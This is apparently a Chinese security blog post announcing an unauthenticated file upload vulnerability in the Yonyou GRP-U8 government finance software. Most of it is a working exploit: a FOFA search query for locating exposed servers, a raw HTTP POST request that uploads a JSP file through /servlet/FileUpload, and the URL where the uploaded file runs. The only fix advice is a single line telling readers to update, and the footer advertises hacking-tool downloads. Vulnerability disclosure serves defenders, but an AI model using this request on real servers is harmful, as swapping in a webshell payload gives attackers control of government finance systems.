正文

安全情报,X友GRP-U8 FileUpload 存在文件上传漏洞!!!

admin
admin V管理员 /0 评论 /115 阅读
0107
此篇文章发布距今已超过321天,您需要注意文章的内容或图片是否可用!

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,禁止私自转载,如需转载,请联系作者!!!!

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!!!!!

漏洞介绍

用友GRP-U8行政事业内控管理软件是用友公司专注于国家电子政务事业所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件,是全国广大行政事业用户最佳实践的结晶,/servlet/FileUpload接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

影响版本

用友-GRP-U8

漏洞情报

fofa语句

app="用友-GRP-U8"

Poc

POST /servlet/FileUpload?fileName=test.jsp&actionID=update HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: close
<% out.println("test");%>
访问上传文件
http://x.x.x.x/R9iPortal/upload/test.jsp

修复建议

建议及时更新至最新版本!

关注我们


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网